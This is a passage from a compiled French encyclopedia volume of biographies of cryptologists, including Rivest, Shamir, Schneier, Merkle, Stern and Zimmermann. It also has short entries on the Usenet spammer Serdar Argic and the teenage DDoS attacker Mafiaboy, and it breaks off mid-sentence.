Après un doctorat en informatique et en mathématiques, il part aux États-Unis en 1984 pour enseigner à l'Université de Chicago. Durant les années 1990, avec son équipe des laboratoires de Bellcore dans le New Jersey, il réussit à factoriser à plusieurs reprises des nombres RSA (RSA-129, RSA-130, RSA-155). Lenstra s'est particulièrement intéressé à la factorisation en publiant plusieurs documents à ce sujet.

En 2004, il rejoint Bell Labs et devient professeur à l'université technique d'Eindhoven. En collaboration avec Xiaoyun Wang et Benne de Weger, il publie une attaque pour générer des collisions sur les certificats X.509. Lenstra est aussi à l'origine d'une fonction de hachage basée sur le logarithme discret : VSH. Arjen Lenstra à l'EPFL en avril 2006 Depuis 2006, il est professeur à l'École polytechnique fédérale de Lausanne où un centre consacré à la sécurité de l'information a vu le jour sous sa direction.

Bibliographie • Notices d’autorité : Système universitaire de documentation [1] • Bibliothèque nationale de France [2] • Fichier d’autorité international virtuel [3] • Bibliothèque du Congrès [4] • WorldCat [5] Ses publications incluent : • L'algorithme LLL. A. K. Lenstra, H. W. Lenstra, Jr. and L. Lovász, Factoring Polynomials with Rational Coefficients, Math. Ann. 261 (1982).

Références

[1] http:/ / www. idref. fr/ 083819088

[2] http:/ / catalogue. bnf. fr/ ark:/ 12148/ cb124341825

[3] http:/ / viaf. org/ viaf/ 113321875

[4] http:/ / id. loc. gov/ authorities/ names/ n93053430

[5] http:/ / www. worldcat. org/ identities/ lccn-n-93-53430 James Massey 386 James Massey

Pour les articles homonymes, voir Massey. James Massey

Données clés

Nom de naissance James Lee Massey

Naissance 11 février 1934 Wauseon, Ohio

Décès 16 juin 2013 (à 79 ans)

Nationalité États-Unis

Profession Cryptologue

James Lee Massey (né le 11 février 1934 à Wauseon, Ohio et mort le 16 juin 2013) est un cryptologue américain. Ingénieur en électricité, diplômé de l'Université Notre Dame, Indiana, Massey obtient un doctorat, consacré à la théorie des codes (« Threshold Decoding »), en 1962 au Massachusetts Institute of Technology (MIT). À la suite de son doctorat, il obtient un poste d'assistant professor, à l'université Notre Dame. De 1977 à 1980, il enseigna d'abord au MIT puis à l'Université de Californie à Los Angeles. Enfin, en 1980, il devient professeur du laboratoire de traitement du signal à l'EPFZ à Zurich en Suisse. Il reste à l'EPFZ jusqu'à ce qu'il prenne sa retraite le 1er avril 1998. James Massey a largement contribué aux domaines de la cryptographie et de la théorie de l'information. Pour ses publications et ses ouvrages, il a reçu plusieurs distinctions dont le Shannon Award décerné par l'IEEE. En 1992, il reçoit le Alexander Graham Bell Medal également attribué par IEEE. Massey est à l'origine de plusieurs brevets. Dans ses contributions les plus connues figure l'algorithme de chiffrement symétrique IDEA qu'il a conçu avec Xuejia Lai et que l'on retrouve par exemple dans openssl. On lui doit également un algorithme de cryptanalyse de registre à décalage, portant le nom de Berlekamp-Massey -- il s'agit d'une adaptation d'un algorithme de décodage des codes BCH dû à Elwyn Berlekamp. Massey était membre de la National Academy of Sciences aux États-Unis et membre honoraire de la Swiss Academy of Engineering Sciences. Ralph Merkle 387 Ralph Merkle

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Ralph C. Merkle (né le 2 février 1952), est un cryptographe américain et chercheur en nanotechnologie. Il est l'un des pionniers de la cryptographie asymétrique avec Martin Hellman et Whitfield Diffie. En 1974, il a créé les puzzles de Merkle, la première construction (non top secrète) à clef publique (publication en 1978). Merkle a étudié l'informatique à Berkeley et obtient un Master en 1977. En 1979, il reçoit son doctorat à Stanford. Son travail de thèse portait sur les systèmes à clé publique. Il est aussi à l'origine de plusieurs fonctions de hachage dont Snefru, de la construction de Merkle-Damgård et des algorithmes de chiffrement de bloc Khufu/Khafre. Ralph Merkle au Singularity Summit en 2007 Par la suite, Merkle travaille sur des compilateurs chez Elxsi. En 1988, il est engagé chez Xerox qu'il quitte en 1999. En tant que directeur du GTISC et de Alcor Life Extension Foundation, il se concentre actuellement sur les nanotechnologies et en particulier, les systèmes reconfigurables à l'échelle moléculaire.

Articles connexes •• arbre de Merkle

Liens externes • Ralph Merkle homepage [1] • "La cryonie comme traitement expérimental", Transition [2] • The First Ten Years of Public-Key Cryptography [3] Whitfield Diffie, Proceedings of the IEEE, vol. 76, no. 5, May 1988, pp: 560-577 (1.9MB PDF file)

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www. merkle. com/

[2] http:/ / www. dtext. com/ transition/ merkle/ merkle1. html

[3] http:/ / cr. yp. to/ bib/ 1988/ diffie. pdf David Naccache 388 David Naccache

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Pour les articles homonymes, voir Naccache. David Naccache est un cryptologue français, professeur à l'Université Paris II et membre du laboratoire d'informatique de l'ENS.

Biographie

Après avoir passé sa thèse en cryptologie en 1995, il découvre, avec Jacques Stern les systèmes de cryptage Naccache-Stern knapsack en 1997 et Naccache-Stern en 1998. Il a également été responsable du département de recherche en sécurité de la société Gemplus entre 1993 et 2005. En 2004, il obtient son habilitation à diriger des recherches.

Liens externes

• (fr) Page personnelle [1] • (fr) Les Ernests : Quel est le QI de Dionaea Muscipula ? [2]

• Portail de la cryptologie David Naccache (2011) • Portail de la sécurité informatique

Références

[1] http:/ / www. di. ens. fr/ DavidNaccache. html

[2] http:/ / www. les-ernest. fr/ naccache Phong Nguyen 389 Phong Nguyen

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Phong Quang Nguyen (1975 à Paris, France - ) est un cryptologue français d'origine vietnamienne. Ayant obtenu le baccalauréat à 15 ans, ancien élève de l'École normale supérieure de Lyon (promotion 1993), il a soutenu en 1999 sa thèse intitulée la Géométrie des nombres en cryptologie, qu'il avait effectuée sous la direction de Jacques Stern au laboratoire d'informatique de l'École normale supérieure. Il y est actuellement affecté en tant que directeur de recherche à l'INRIA. Ses travaux portent notamment sur l'étude des réseaux euclidiens et leurs applications en cryptologie. Il a remporté en 2001 [1] le Prix Cor Baayen, accordé au jeune chercheur le plus prometteur en sciences de l'informatique et en mathématiques appliquées, qui vient d'obtenir son doctorat dans l'un des pays suivants: Allemagne, Autriche, Finlande, France, Grande-Bretagne, Grèce, Hongrie, Irlande, Italie, Pays-Bas, République tchèque, Slovaquie, Suède et Suisse. Dans l'adresse de remise du prix, il fut décrit comme étant « considéré maintenant par la communauté cryptographique internationale comme l'un des spécialistes de pointe en cryptanalyse fondée sur la théorie des nombres, malgré son jeune âge ». (Despite his young age (26), Phong is now regarded by the international cryptographic community as one of the foremost specialists of number-theoretical cryptanalysis.). Il donne des cours à l'École pour l'informatique et les techniques avancées, pour les spécialisations télécommunications (TCOM), systèmes, réseaux et sécurité (SRS) et calcul scientifique et image (CSI). [2]

Liens externes • Page officielle [3]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www. specif. org/ prix-these/ cb/ 2001. html

[2] http:/ / www. epita. fr/ etudes-programmes-cours. php?intitule=Cryptologie+ %28Avanc%E9e%29

[3] http:/ / www. di. ens. fr/ ~pnguyen Bart Preneel 390 Bart Preneel

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Bart Preneel, cryptologue belge et professeur à la Katholieke Universiteit Leuven où il est directeur du groupe COSIC (Computer Security and Industrial Cryptography). Preneel est l'un des auteurs de la fonction de hachage RIPEMD-160. Avec Shoji Miyaguchi, il est à l'origine de la construction de Miyaguchi-Preneel qui est utilisée dans Whirlpool. Ses recherches sont principalement axées sur le hachage et l'authentification avec plus de 140 publications. Preneel occupe le poste de vice-président de l'IACR (International Association for Cryptologic Research) et a été un des organisateurs du concours NESSIE. En 2003, il reçoit le prix européen de la sécurité informatique pour sa contribution lors de NESSIE.

Liens externes • Notices d’autorité : Système universitaire de documentation [1] • Fichier d’autorité international virtuel [2] • Bibliothèque du Congrès [3] • Gemeinsame Normdatei [4] • WorldCat [5] • (en) Page de Bart Preneel [6] • (en) Liste des publications de Preneel [7]

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www. idref. fr/ 104552565

[2] http:/ / viaf. org/ viaf/ 10106189

[3] http:/ / id. loc. gov/ authorities/ names/ n93087510

[4] http:/ / d-nb. info/ gnd/ 121965252

[5] http:/ / www. worldcat. org/ identities/ lccn-n-93-87510

[6] http:/ / www. esat. kuleuven. ac. be/ ~preneel/

[7] http:/ / www. informatik. uni-trier. de/ ~ley/ db/ indices/ a-tree/ p/ Preneel:Bart. html Ronald Rivest 391 Ronald Rivest

Ronald Linn Rivest, né en 1947 à New York, est un cryptologue américain d'origine canadienne-française. Il est l'un des trois inventeurs de l'algorithme de cryptographie à clé publique RSA, premier exemple de cette famille. Diplômé de l'université Yale en 1969 et docteur de Stanford en 1974, il rejoint les laboratoires du MIT où il fonde un groupe travaillant sur la sécurité de l'information et la cryptographie. Il y met au point les algorithmes à clé secrète nommés Rivest Cipher : RC2, RC4, RC5 et RC6, ainsi que des fonctions de hachage MD2, MD4, MD5 et MD6.

En 1977, il décrit avec Adi Shamir et Len Adleman le premier Sherman, Rivest, et Chaum algorithme de chiffrement à clé publique, nommé RSA selon leurs initiales. Ils reçoivent en 2002 pour cette découverte le prix Turing de l'Association for Computing Machinery. Ron Rivest a fondé la société RSA Data Security (plus tard rebaptisée RSA Security). En collaboration avec Thomas H. Cormen (en), Charles E. Leiserson (en) et Clifford Stein (en), il a publié le livre Introduction à l'algorithmique (en) (éditions Dunod, 2002 (ISBN 978-2-10-003922-7)).

Annexes

Liens externes • (en) Publications [1] de Ronald L. Rivest sur DBLP • (en) Publications [2] de Ronald L. Rivest sur ScientificCommons

• Portail de la cryptologie • Portail de la sécurité informatique

Références

[1] http:/ / www. informatik. uni-trier. de/ ~ley/ db/ indices/ a-tree/ r/ Rivest:Ronald_L=. html

[2] http:/ / en. scientificcommons. org/ ronald_l_rivest Bruce Schneier 392 Bruce Schneier

Bruce Schneier est un cryptologue, un spécialiste en sécurité informatique et un écrivain américain né le 15 janvier 1963. Il est l'auteur de plusieurs livres sur la cryptographie et il est le fondateur de la société Counterpane Internet Security. Originaire de New York, Schneier vit actuellement à Minneapolis avec sa femme Karen Cooper. Bruce Schneier a obtenu un master en informatique à l'American University et un bachelor en physique décroché à l'Université de Rochester. Avant de créer la Counterpane, il a travaillé au Département de la Défense des États-Unis ainsi qu'aux Bell Labs. Suite au rachat de Counterpane par BT Group en octobre 2006[1] Schneier est devenu le responsable en chef de la sécurité des technologies pour BT. Counterpane est à présent une branche de BT Group dénommé BT Managed Security Solutions.

Son livre, Cryptographie appliquée remporte un franc succès. Il est également l'inventeur de plusieurs primitives cryptographiques : Bruce Schneier en 2007. • Blowfish, algorithme de chiffrement symétrique par bloc, très populaire et inviolé à ce jour ; • Twofish, algorithme de chiffrement symétrique par bloc, qui fut candidat pour le Standard de chiffrement avancé (AES) ; • MacGuffin, algorithme de chiffrement symétrique par bloc ; • Yarrow et Fortuna, générateurs de nombres pseudo-aléatoires ; • Skein, fonction de hachage candidate à la compétition de fonction de hachage du NIST pour SHA-3 ; • Solitaire, un algorithme de chiffrement « manuel ». Le chiffrement Solitaire a été mentionné dans Cryptonomicon de Neal Stephenson sous le nom de Pontifex. Blowfish est également mentionné dans la 4e saison de la série 24 heures chrono et malgré ce qui est dit dans la série, Blowfish n'est toujours pas cassé à ce jour. Schneier dénonce dans ses livres la mauvaise utilisation du chiffrement dans les institutions et les entreprises. En particulier, il insiste sur les risques liés à des protocoles qui ne seraient pas suivis à la lettre (par exemple, clés envoyées en clair dans des courriels), de même que les défauts inhérents aux ordinateurs (plantage, bugs, complexité trop grande, etc.). Dans Cryptographie pratique, il tente de donner une voie à suivre pour établir des recommandations pour les utilisateurs et implémenter correctement les primitives cryptographiques. Bruce Schneier est aussi l'auteur d'un blog sur la sécurité. Il apparaît souvent dans les journaux pour dénoncer les failles dans la sécurité, de la biométrie à la sécurité liée au terrorisme. A l'image des Chuck Norris Facts, on trouve aussi les Bruce Schneier Facts, des blagues qui sont l’objet d’un mème sur Internet. Cette reprise, de par les « faits » qu’elle énonce, reste essentiellement limitée aux milieux mathématiques et informatiques[2] Bruce Schneier 393

Bibliographie • Notices d’autorité : Système universitaire de documentation [3] • Bibliothèque nationale de France [4] • Fichier d’autorité international virtuel [5] • Bibliothèque du Congrès [6] • Gemeinsame Normdatei [7] • WorldCat [8] e • (en) Bruce Schneier, Applied Cryptography, 2 éd. (ISBN 0-4711-1709-9) • Bruce Schneier (trad. Laurent Viennot), Cryptographie appliquée [« Applied cryptography »], Vuibert, [9] coll. « Vuibert informatique », 15 janvier 2001, broché, 846 p. (ISBN 2-7117-8676-5)(ISSN 1632-4676 ) (OCLC 46592374 [10] ) • (en) Bruce Schneier, Secrets and Lies: Digital Security in a Networked World (ISBN 0-4712-5311-1) • (en) Niels Ferguson, Bruce Schneier, Practical Cryptography (ISBN 0-4712-2357-3) • (en) Bruce Schneier, Beyond Fear: Thinking Sensibly about Security in an Uncertain World (ISBN 0-3870-2620-7)

Liens externes • (en) Site personnel [11] • (en) Blog [12] • (en) Counterpane.com [13] • (en) (mul) Crypto-Gram [14]

Notes et références

[2] (http:/ / www. schneierfacts. com/ ).

[3] http:/ / www. idref. fr/ 033325685

[4] http:/ / catalogue. bnf. fr/ ark:/ 12148/ cb124202781

[5] http:/ / viaf. org/ viaf/ 24690424

[6] http:/ / id. loc. gov/ authorities/ names/ n93043083

[7] http:/ / d-nb. info/ gnd/ 123003180

[8] http:/ / www. worldcat. org/ identities/ lccn-n-93-43083

[9] http:/ / worldcat. org/ issn/ 1632-4676& lang=fr

[10] http:/ / worldcat. org/ oclc/ 46592374& lang=fr

[11] http:/ / www. schneier. com/

[12] http:/ / www. schneier. com/ blog/

[13] http:/ / www. counterpane. com/

[14] http:/ / www. schneier. com/ crypto-gram. html

• Portail de la cryptologie • Portail de la sécurité informatique Adi Shamir 394 Adi Shamir

Adi Shamir עדי שמיר

Adi Shamir en 2009

Données clés

Naissance 6 juillet 1952 Tel Aviv (Israël)

Nationalité Israël

Champs Cryptographie, Mathématiques appliquées

Institutions Institut Weizmann

Diplômé de Université de Tel Aviv

Directrice de thèse Zohar Manna

Étudiants en thèse Eli Biham

Renommé pour Algorithme RSA Cryptanalyse différentielle

Distinctions Prix Turing né le 6 juillet 1952 à Tel Aviv, est un mathématicien et un cryptologue Israélien ,(עדי שמיר Adi Shamir (en hébreu reconnu comme l'expert le plus éminent en cryptanalyse[1]. Il est professeur au département de mathématiques appliquées de l'Institut Weizmann depuis 1984 où il occupe la chaire Borman de science informatique. En 1978, il a créé avec Ron Rivest et Len Adleman, l'algorithme RSA, première mise en œuvre du concept de cryptographie asymétrique dont les fondements furent posés par Whitfield Diffie et Martin Hellman en 1976. Adi Shamir 395

Biographie Adi Shamir est l'une des figures emblématiques de la cryptographie et de la cryptanalyse à travers le monde. Il a introduit et mis en œuvre la notion de partage du secret qui s'est révélée être une idée fondamentale, utilisée non seulement dans la pratique, mais également dans des centaines de travaux théoriques. Sa proposition de générateurs pseudo-aléatoires, fondée sur l'inviolabilité de la fonction RSA, a inspiré le développement de la théorie de la génération d'aléa. Adi Shamir est, de loin, l'expert le plus éminent en cryptanalyse. Ses plus grandes réussites, dans ce domaine, sont les attaques sur les cryptosystèmes basés sur le problème du sac à dos, qu'il a essentiellement éliminés du paysage cryptographique, et l'invention de la cryptanalyse différentielle, première méthode d'attaque systématique des algorithmes de chiffrement par bloc. Co-inventeur du célèbre schéma d'identification "Feige-Fiat-Shamir", Adi Shamir a ainsi établi l'intérêt pratique des preuves sans transfert d'information, dites aussi "zero-knowledge", dans le contexte de l'authentification et du contrôle d'accès. Les travaux qu'il a ensuite conduits avec ses élèves sur les preuves à témoin indistinguable et les preuves "zero-knowledge" non interactives sont aujourd'hui des pierres angulaires de la recherche théorique en cryptographie. Enfin, Adi Shamir a apporté des contributions décisives dans d'autres domaines de l'informatique, notamment en théorie de la complexité algorithmique où il a établi l'identité des classes de complexité IP et PSPACE.

Études Shamir reçoit un BS en mathématiques à l'université de Tel Aviv en 1973 suivi d'un MSc et d'un doctorat en informatique à l'Institut Weizmann (1975-1977). Sa thèse est intitulée « Points fixes dans les programmes récursifs » . Après une année à l'université de Warwick, il travaille au Massachusetts Institute of Technology de 1977 à 1980 avant de retourner à l'Institut Weizmann.

Références

[1] Adi SHAMIR (http:/ / www. biologie. ens. fr/ dbmedia/ doctorats/ shamir. html), Biographie de École normale supérieure

• Portail de la cryptologie • Portail de la sécurité informatique Dmitry Sklyarov 396 Dmitry Sklyarov

Dmitry Sklyarov (2010)

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Dmitry Sklyarov (Дмитрий Скляров), né le 18 décembre 1974, est un programmeur russe employé de la société ElcomSoft. Il est connu pour avoir été poursuivi en 2001 par la société américaine Adobe qui s'est plainte que le système de protection anti-copie de son format de fichier e-book était contourné par le produit de ElcomSoft. Sklyarov étant doctorant en cryptanalyse chez ElcomSoft, dans laquelle il avait mis au moins un logiciel de gestion de livres électroniques nommé AEBPR. Le 16 juillet 2001, après avoir donné une conférence intitulée «eBook's Security - Theory and Practice» à la convention DEF CON à Las Vegas, il a été arrêté par le FBI à l'aéroport alors qu'il s'apprêtait à embarquer pour Moscou. Il lui a été reproché d'avoir diffusé un logiciel destiné à contourner des mesures de protection logicielles, selon les termes du Digital Millennium Copyright Act. Il a été libéré le 6 août, moyennant une caution de 50,000 dollars américains et n'était pas autorisé à quitter la Californie du Nord. Les charges pesant contre Sklyarov ont ultérieurement été levées en échange de son témoignage. Il a été autorisé à retourner en Russie le 13 décembre. Le 18 décembre 2002, après un procès de deux semaines, à San Jose, en Californie, un jury a considéré que Elcomsoft n'avait pas violé la loi américaine.

• Portail de la cryptologie • Portail de la sécurité informatique Jacques Stern (cryptologue) 397 Jacques Stern (cryptologue)

Pour les articles homonymes, voir Jacques Stern. Jacques Stern

Jacques Stern prononçant un discours avant de recevoir la médaille d'or du CNRS.

Données clés

Naissance 21 août 1949

Champs Cryptologie

Institutions ARCEP

Diplômé de École normale supérieure

Distinctions Légion d'honneur, Médaille d'or du CNRS

Jacques Stern, né le 21 août 1949, est un cryptologue français de renommée internationale. D'après le site Cryptostats[1], c'est le chercheur français vivant ayant le plus important nombre de publications aux congrès CRYPTO/EUROCRYPT, les plus prestigieux en cryptologie. Il est actuellement membre du collège de l'Autorité de Régulation des Communications Electroniques et des Postes (ARCEP)[2]

Enfance et études Son milieu familial est éloigné du monde scientifique. Ses grands-parents, juifs d'Europe centrale et de Salonique, émigrent en France à la fin du XIXe siècle. Ses parents, installés à Paris, tenaient un commerce de vêtements. Son père fut prisonnier de guerre, sa mère déportée en Allemagne. Un professeur de mathématiques oriente cet abonné aux prix d'excellence vers Louis-le-Grand et sa préparation scientifique ; il prend goût à la recherche. En 1968, il entre à l'École normale supérieure (ENS) où il est reçu cacique à l'agrégation de mathématiques en 1971 et obtient son titre de docteur en 1975 par une thèse sur la théorie des ensembles. Après un séjour d'un an à l'Université de Berkeley, il épouse une juriste spécialiste de droit international. Il a occupé depuis 1972 différents postes dans l'enseignement supérieur en France ; il est directeur du Département d'informatique de l'ENS de 1999 à 2007. Jacques Stern (cryptologue) 398

Le père de la cryptologie française Créer utile devient son obsession, il choisit ainsi l'informatique, « cette mécanisation de l'abstraction », et en particulier la cryptologie. En mathématiques sa spécialité – prouver que quelque chose est impossible – n'a « aucun intérêt pratique ». Mais en cryptologie « si on peut garantir que l'adversaire est dans l'impossibilité d'accéder à des données la preuve devient utile », résume-t-il. Il contribue dans les années 1970 à l'émergence en France d'une discipline jusqu'alors essentiellement anglo-saxonne, dont le souci principal est de sécuriser les échanges de données. David Naccache, ancien étudiant retourné à la recherche universitaire après un passage à Gemplus, assure qu'« il a fait école, c'est le père de la cryptologie française moderne. » En 1999, une loi inspirée de son rapport confidentiel-défense sur la cryptologie rendu l'année précédente au gouvernement, en libère l'usage par les particuliers, après une longue résistance de la défense qui voulait conserver le monopole de cette technologie classée arme de guerre de deuxième catégorie.[réf. nécessaire] Décret no 95-589 du 6 mai 1995 relatif à l'application du décret du 18 avril 1939 fixant le régime des matériels de guerre, armes et munitions, article 2. Consultable sur internet, par exemple sur le site légifrance NOR: DEFC9501482D Il a contribué à fonder le laboratoire, puis le département d'informatique, de l'ENS. Alors qu'il y était depuis 1992 professeur mis à disposition par l'Université Paris 7, il y a été titularisé en 2003. Il a écrit en 1998 un livre de vulgarisation sur la cryptographie, La Science du secret, publié aux Éditions Odile Jacob.

Recherches et récompenses Ses recherches portent notamment sur l'application de la géométrie des nombres à la cryptographie asymétrique. Créateur d'algorithmes de chiffrement, utilisés dans certaines applications en ligne, il a également écrit de nombreux articles sur la cryptanalyse de primitives symétriques et asymétriques. Stern et son équipe sont également à l'origine du chiffrement de bloc DFC (Decorrelated Fast Cipher) proposé au concours AES. Il est officier de la Légion d'honneur, docteur honoris causa de l'Academia Tehnică Militară (Bucarest) et a reçu en 2005 la médaille d'argent du CNRS. En 2006, il s'est vu décerner la médaille d'or du CNRS[3],[4]. Un colloque scientifique en l'honneur du 60e anniversaire de Jacques Stern a été organisé à l'ENS le 4 septembre 2009[5].

Autres fonctions Jacques Stern a également occupé les fonctions de président du Conseil d'Administration d'Ingenico, premier fabricant européen de moyens de paiement sécurisés (de 2007 à 2010) et président de l'Agence nationale de la recherche (ANR), de 2007 à 2010. Jacques Stern est depuis 2010 conseiller auprès du Ministre de la recherche et de l'enseignement supérieur.

Publications • 1998 : La Science du secret, Ed .Odile Jacob, . • 1979 : Sous la direction de S. Grigorieff, K. McAloon, J. Stern, Théorie des ensembles : séminaire GMS, (Exposés présentés au Séminaire de théorie des ensembles de l'Université Paris VII pendant les années 1976-1977 et 1977-1978), U.E.R. de mathématiques, Université Paris VII, 228p. Jacques Stern (cryptologue) 399

Références

[1] site Cryptostats (http:/ / www. cs. colorado. edu/ ~jrblack/ cryptostats/ stats. php)

[2] http:/ / www. lefigaro. fr/ flash-eco/ 2012/ 01/ 12/ 97002-20120112FILWWW00434-jacques-stern-nomme-a-l-arcep. php [3] Hervé Morin, « Jacques Stern, briseur de codes », Le Monde daté du 6 octobre 2006 [4][4]Communiqué de presse du CNRS, « Médaille d'or 2006 du CNRS : Jacques Stern »

[5] « Colloque pour les 60 ans de Jacques Stern » (http:/ / www. di. ens. fr/ ~pointche/ JS60/ inscription. php)

Philip Zimmermann

Pour les articles homonymes, voir Zimmermann. Philip Zimmermann (né le 12 février 1954) est le créateur de Pretty Good Privacy (PGP), le logiciel de chiffrement de courrier électronique le plus utilisé au monde. Il a été le premier à mettre à la disposition du public un logiciel de chiffrement facilement utilisable fondé sur la technique de la clé asymétrique (ou clé publique). Cela lui valut une enquête criminelle de trois ans de la part des Douanes américaines. Le gouvernement lui reprochait d'avoir violé les restrictions sur l'exportation de logiciels de cryptographie en diffusant PGP dans le monde entier (PGP avait été publié en 1991 sur le web comme logiciel libre).

Après le classement sans suite de la procédure par le gouvernement début 1996, Zimmermann fonda PGP Inc. Cette société a été achetée par Network Associates (NAI) en décembre 1997. Il y est resté trois ans en tant que senior fellow. En 2002, PGP a été rachetée à NAI par une nouvelle société appelée PGP Corporation, dans laquelle Philip Zimmermann Zimmermann exerce actuellement la fonction de conseiller spécial et consultant. Zimmermann est aussi associé de la Stanford Law School's Center for Internet and Society.

Zimmermann a reçu de nombreuses distinctions techniques et humanitaires pour son travail innovant dans le domaine de la cryptographie. En 2006, il a créé Zfone, un logiciel de chiffrement de communication de téléphonie sur Internet au standard ouvert SIP, fonctionnant en P2P. En 2012, il se lance dans la création de Silent Circle, une application permettant de chiffrer les communications entre deux téléphones mobiles[1] et basé sur le protocole ZRTP dont il a contribué à l'élaboration. Philip Zimmermann 400

Récompense En 2012, il est cité parmi les innovateurs d'Internet dans le site Internet Hall of Fame [2]

Citation « If privacy is outlawed, only outlaws will have privacy », soit, en français : « Si l'intimité est mise hors la loi, seuls les hors-la-loi auront une intimité. »

Notes et références

[1] http:/ / korben. info/ silent-circle-chiffrer-telephone. html

[2] (http:/ / www. internethalloffame. org/ inductees/ philip-zimmermann), www.internethalloffame.org, (consulté le 25 Avril 2012)

Liens externes

• Site officiel (http:/ / philzimmermann. com/ )

• Pourquoi j'ai écrit PGP (http:/ / www. vadeker. net/ humanite/ geopolitique/ pgp1. html) par Philip Zimmermann

• J'ai développé PGP et je ne le regrette pas (http:/ / infos. samizdat. net/ article. php3?id_article=96) par Philip Zimmermann

• Portail de la cryptologie • Portail de la sécurité informatique 401

13.3-Autres

Serdar Argic

Serdar Argic est le pseudonyme d'une personne qui fut à l'origine des premiers grands incidents de spam sur Usenet, en inondant les forums Usenet de réponses aux messages qui parlaient de la Turquie. Les avocats Canter & Siegel (en) sont habituellement tenus pour responsables des premiers envois de spams en 1994, mais quelques mois avant le flood « Green Card », l'envoi du spam Serdar Argic eut lieu. Malgré de forts soupçons, l'identité réelle derrière Serdar Argic ne fut jamais révélée. Serdar Argic a tenu des propos négationnistes à propos du génocide arménien[1]. Certains l'ont soupçonné d'être à la solde du gouvernement turc, encore que cette hypothèse semble aujourd'hui officiellement écartée. Pendant une période de deux mois, au début de 1994, ce « Serdar Argic » postait des messages dans tout groupe de discussion contenant une conversation impliquant la Turquie. Ces messages faisaient suite à d'autres réponses similaires publiées pendant les deux années précédentes sous divers noms, mais probablement par la même personne. Toute présence du mot « Turkey » (« Turquie » en anglais, mais aussi dinde) provoquait l'apparition de Serdar Argic, qui postait une réponse dans laquelle il argumentait qu'il n'y avait jamais eu de génocide arménien, ou encore que les Arméniens étaient responsable d'un génocide visant les Turcs. La quantité de messages postés par Serdar Argic atteignit plusieurs dizaines de milliers, ce qui conduisit à penser qu'ils étaient postés par un programme informatique, qui fut surnommé le zumabot, du nom du site Internet d'où provenaient apparemment les messages. Ce bot balayait vraisemblablement tout Usenet à la recherche du mot « Turkey ». S'il trouvait un message contenant ce mot, il postait en réponse un de ses messages, même si le message d'origine parlait en fait de dinde[2]. Les utilisateurs d'Usenet ont envoyé un flot de plaintes à UUnet, le FAI hébergeant le compte de Serdar Argic. UUnet ne répondit jamais aux plaintes. Néanmoins, le compte Serdar Argic disparut à la mi-1994 après qu'un newsgroup fut créé, servant de filtre et générant des suppressions de messages sur les interventions venant de Turquie. Le nom de Ahmed Cosar émergea de l'enquête. C'était un étudiant turc qui avait enregistré le domaine anatolia.org, origine des messages Usenet[2]. Les messages de Serdar Argic ont été globalement jugés comme une tentative assez grossière de faire du négationnisme. Une étude intitulée « Le négationnisme sur Internet » et publiée dans la Revue d'histoire de la Shoah (no 170, sept-déc. 2000)[3], rapporte que « Serdar Argic » fut considéré comme « la sixième 'personne' la plus malveillante d'Usenet »[4]. L'information la plus complète en français sur Serdar Argic se trouve dans l'article « La négation du génocide arménien sur Internet », Revue d'histoire de la Shoah, no. 177-178 janvier-août 2003[5]. Serdar Argic 402

Notes et références

[1] Net.Wars, Wendy Grossman, NYU Press, 1997, chapter 11 (http:/ / www. nyupress. org/ netwars/ pages/ chapter11/ ch11_. html)

[2] The Zumabot's Tale, Jeanne A. E. DeVoto, 1994 (http:/ / www. jaedworks. com/ shoebox/ zumabot. html)

[3] « Le négationnisme sur Internet : Genèse, stratégies, antidotes » (http:/ / www. phdn. org/ negation/ negainter/ ), par Gilles Karmasyn, en collaboration avec Gérard Panczer et Michel Fingerhut.

[4] « Le négationnisme sur Internet » (http:/ / www. phdn. org/ negation/ negainter/ forumrac. html), chap. 4 (Racismes et négationnisme sur les forums de discussion)

[5] « La Négation du Génocide Arménien sur Internet » (http:/ / www. phdn. org/ armenocide/ internet/ ), par Gilles Karmasyn, et en particulier le

chapitre 1A (http:/ / www. phdn. org/ armenocide/ internet/ forums. html#IA) intitulé La première campagne de haine sur internet : « Serdar Argic ».

Michael Calce

Cet article est une ébauche concernant la sécurité informatique et une personnalité canadienne. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Cet article ou cette section doit être recyclé. Une réorganisation et une clarification du contenu sont nécessaires. Discutez des points à améliorer en page de discussion.

Cet article ne cite pas suffisamment ses sources (septembre 2010). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Michael Calce est un résident de l'Île-Bizard près de Montréal au Canada, anciennement connu sous le pseudonyme de Mafiaboy. Il a acquis un certaine notoriété après avoir lancé en février 2000 une série d'attaques de déni de service contre de gros sites Web commerciaux incluant Yahoo!, Amazon.com, Dell, E*TRADE, eBay et CNN[2], et ce alors qu'il n'était âgé que de 15 ans. Ces attaques, qui firent les manchettes de la presse internationale, auraient coûté un total d'environ 1,7 milliard de dollars US à ces entreprises. Le FBI et la GRC ont commencé à s'intéresser à Mafiaboy après qu'il eut affirmé sur IRC qu'il était l'auteur de ces cyberattentats. Il est devenu le suspect principal après s'être vanté d'avoir fermé le site web de Dell, une information qui n'avait pas été publiée à ce moment. Il fut arrêté le 15 avril 2000. Mafiaboy utilisait des logiciels fournis par d'autres crackers. Il était clair, pour le FBI et la GRC qui le surveillaient, qu'il n'était pas un hacker talentueux mais plutôt un script kiddie sans raffinement. Lui même se définissait comme « plutôt entre les deux ». Pourtant son attaque demeure (aujourd'hui encore) l'attaque qui a causé le plus de pertes. Pour ses attaques, il a utilisé des logiciels créés par d'autres hackers, car il ne connaissait pas assez le langage C pour créer ses propres programmes de déni de service. Pour ses attaques, il aurait utilisé le logiciel trinoo, qu'il avait conçu 